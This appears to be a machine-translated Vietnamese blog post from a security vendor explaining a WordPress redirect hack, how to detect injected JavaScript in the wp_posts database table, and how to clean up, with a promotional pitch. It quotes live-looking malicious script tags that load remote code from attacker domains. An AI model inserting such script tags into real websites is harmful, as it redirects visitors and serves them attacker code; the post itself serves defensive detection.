Các vụ hack chuyển hướng WordPress đã là một mối đe dọa trong một thời gian dài. Nó tự biến hình thành các vụ hack chuyển hướng mới vài tuần một lần. Chúng tôi đã đề cập đến tất cả các loại chuyển hướng WordPress đó và khi nào chúng đến. Thêm vào danh sách là bài đăng blog này phát hiện ra một loại hack chuyển hướng WordPress khác. Hack này chuyển hướng khách truy cập trang blog đến các miền độc hại.
Một số miền độc hại bao gồm adaranth. [Com], buyittraffic. [Com], cuttraffic. [Com], Statistics [.] Admarketlocation [.] Com, planeobservetoo1 [.] trực tiếp , v.v.
Làm thế nào để kiểm tra xem bạn có bị nhiễm hay không?
1. Quan sát các triệu chứng
- Khách truy cập chuyển hướng đến các miền không được yêu cầu.
- Thứ hạng trên Google giảm cho các trang blog của bạn.
- Bạn đã nhận được thông báo cảnh báo từ Google về hành vi trang web bất hợp pháp.
- Trang web của bạn đã được đưa vào danh sách đen. Bạn có thể dễ dàng kiểm tra điều này bằng công cụ kiểm tra danh sách đen này.
- Mã nguồn của trang web có các liên kết độc hại.
Công cụ của chúng tôi quét hơn 65 danh sách đen để kiểm tra xem trang web của bạn có nằm trong danh sách đen hay không
Nếu bạn nhận thấy bất kỳ triệu chứng nào ở trên, trang web của bạn đã bị tấn công.
Chuyển hướng blog WordPress? Hãy khắc phục ngay bây giờ!
2. Kiểm tra bằng máy quét phần mềm độc hại
Một cách khác bạn có thể xác nhận vụ hack là quét trang web của mình bằng máy quét phần mềm độc hại. Bạn có thể sử dụng trình quét phần mềm độc hại trực tuyến cho việc này. Chỉ cần nhập URL trang web của bạn và nhấn Quét .
Làm thế nào để xác định vị trí bị tấn công?
Hầu hết tất cả các vụ hack chuyển hướng đều có cùng một công thức hoạt động đằng sau chúng - tiêm mã độc vào cơ sở dữ liệu hoặc các tệp lõi. Cái này không khác.
Sau khi phân tích vụ hack, chúng tôi đưa ra kết luận rằng hacker chắc chắn đã đưa mã độc vào cơ sở dữ liệu.
Rất có thể tin tặc đã đưa mã JS vào wp_posts bảng (chứa mọi bài đăng của trang web) của cơ sở dữ liệu.
Đây là cách bạn có thể kiểm tra cơ sở dữ liệu của mình:
- Truy cập cơ sở dữ liệu của bạn bằng PHPMyAdmin.
- Đi tới wp_posts bàn. Truy cập bài đăng chuyển hướng và tìm kiếm (Ctrl + F) “adaranth. [Com]” (hoặc các miền độc hại khác) trong bài đăng.
Ví dụ về mã độc hại:
<script src=“https://trafficpage.cool/addons/lnkr5.min.js” type=“text/javascript“></script><script src=“https://trafficpage.cool/addons/lnkr30_nt.min.js” type=“text/javascript“></script><script src=“https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x5953x&r=1536317274530” type=“text/javascript“></script>
Một tập lệnh độc hại khác được tìm thấy trong một trang web bị tấn công trông giống như sau:
<script src=’https://dl.gotosecond2.com/clizkes' type=‘text/javascript’></script>
Làm gì tiếp theo?
Dọn dẹp sự lây nhiễm và bảo mật trang web của bạn.
Bạn càng trì hoãn việc dọn dẹp phần mềm độc hại, nó sẽ càng gây ra nhiều thiệt hại. Chọn chương trình dọn dẹp phần mềm độc hại tức thì của Astra và làm sạch trang web của bạn ngay trong ngày bạn đăng ký. Để được Astra dọn dẹp phần mềm độc hại chuyên nghiệp:
- Đăng ký chương trình dọn dẹp phần mềm độc hại của Astra
- Cập nhật thông tin đăng nhập máy chủ của bạn và thế là xong.
Các kỹ sư bảo mật của chúng tôi sẽ làm sạch sự lây nhiễm, tất cả các backdoor ẩn khỏi trang web của bạn trong vòng 6-8 giờ. Sau đó, Tường lửa do tin tặc đã thử nghiệm của Astra sẽ được triển khai trên trang web của bạn sau khi dọn dẹp để đảm bảo bảo vệ khỏi các cuộc tấn công như vậy trong tương lai.
Kết luận
Sau khi trang web của bạn sạch sẽ và hoạt động hoàn hảo, hãy đảm bảo an toàn cho trang web bằng cách làm theo các phương pháp hay nhất về bảo mật WordPress được khuyến nghị. Một số trong số đó là:
- Chỉ tạo và sử dụng mật khẩu mạnh cho tất cả các tài khoản trên trang web và máy chủ của bạn. Ngoài ra, hãy thường xuyên thay đổi chúng.
- Thay đổi URL quản trị viên mặc định thành URL khác thường.
- Đặt quyền đối với các tệp và thư mục WordPress chính xác
- Hạn chế khu vực quản trị của bạn.
- Hạn chế số lần đăng nhập, v.v.
Bạn có bất kỳ câu hỏi nào về chương trình hoặc Astra? Trò chuyện với chúng tôi.